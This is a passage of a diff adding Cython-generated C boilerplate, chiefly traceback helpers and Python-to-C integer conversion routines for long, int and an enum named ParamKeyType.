funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +/* CIntFromPyVerify */ +#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* CIntFromPy */ +static CYTHON_INLINE enum ParamKeyType __Pyx_PyInt_As_enum__ParamKeyType(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const enum ParamKeyType neg_one = (enum ParamKeyType) -1, const_zero = (enum ParamKeyType) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(enum ParamKeyType) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (enum ParamKeyType) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(enum ParamKeyType) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) >= 2 * PyLong_SHIFT)) { + return (enum ParamKeyType) (((((enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(enum ParamKeyType) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) >= 3 * PyLong_SHIFT)) { + return (enum ParamKeyType) (((((((enum ParamKeyType)digits[2]) << PyLong_SHIFT) | (enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(enum ParamKeyType) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) >= 4 * PyLong_SHIFT)) { + return (enum ParamKeyType) (((((((((enum ParamKeyType)digits[3]) << PyLong_SHIFT) | (enum ParamKeyType)digits[2]) << PyLong_SHIFT) | (enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (enum ParamKeyType) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(enum ParamKeyType) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(enum ParamKeyType, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(enum ParamKeyType) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(enum ParamKeyType, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(enum ParamKeyType) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) - 1 > 2 * PyLong_SHIFT)) { + return (enum ParamKeyType) (((enum ParamKeyType)-1)*(((((enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(enum ParamKeyType) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) - 1 > 2 * PyLong_SHIFT)) { + return (enum ParamKeyType) ((((((enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(enum ParamKeyType) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) - 1 > 3 * PyLong_SHIFT)) { + return (enum ParamKeyType) (((enum ParamKeyType)-1)*(((((((enum ParamKeyType)digits[2]) << PyLong_SHIFT) | (enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(enum ParamKeyType) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) - 1 > 3 * PyLong_SHIFT)) { + return (enum ParamKeyType) ((((((((enum ParamKeyType)digits[2]) << PyLong_SHIFT) | (enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(enum ParamKeyType) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) - 1 > 4 * PyLong_SHIFT)) { + return (enum ParamKeyType) (((enum ParamKeyType)-1)*(((((((((enum ParamKeyType)digits[3]) << PyLong_SHIFT) | (enum ParamKeyType)digits[2]) << PyLong_SHIFT) | (enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(enum ParamKeyType) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum ParamKeyType, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum ParamKeyType) - 1 > 4 * PyLong_SHIFT)) { + return (enum ParamKeyType) ((((((((((enum ParamKeyType)digits[3]) << PyLong_SHIFT) | (enum ParamKeyType)digits[2]) << PyLong_SHIFT) | (enum ParamKeyType)digits[1]) << PyLong_SHIFT) | (enum ParamKeyType)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(enum ParamKeyType) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(enum ParamKeyType, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(enum ParamKeyType) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(enum ParamKeyType, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + PyErr_SetString(PyExc_RuntimeError, + "_PyLong_AsByteArray() not available, cannot convert large enums"); + return (enum ParamKeyType) -1; + } else { + enum ParamKeyType val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (enum ParamKeyType) -1; + val = __Pyx_PyInt_As_enum__ParamKeyType(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to enum ParamKeyType"); + return (enum ParamKeyType) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to enum ParamKeyType"); + return (enum ParamKeyType) -1; +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_enum__ParamKeyType(enum ParamKeyType value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const enum ParamKeyType neg_one = (enum ParamKeyType) -1, const_zero = (enum ParamKeyType) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(enum ParamKeyType) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(enum ParamKeyType) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(enum ParamKeyType) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(enum ParamKeyType) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(enum ParamKeyType) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(enum ParamKeyType), + little, !is_unsigned); + } +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(int) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(int) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(int) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(int), + little, !is_unsigned); + } +} + +/* CIntFromPy */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* FormatTypeName */ +#if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name_2); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__51)); + } + return name; +} +#endif + +/* CIntFromPy */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, 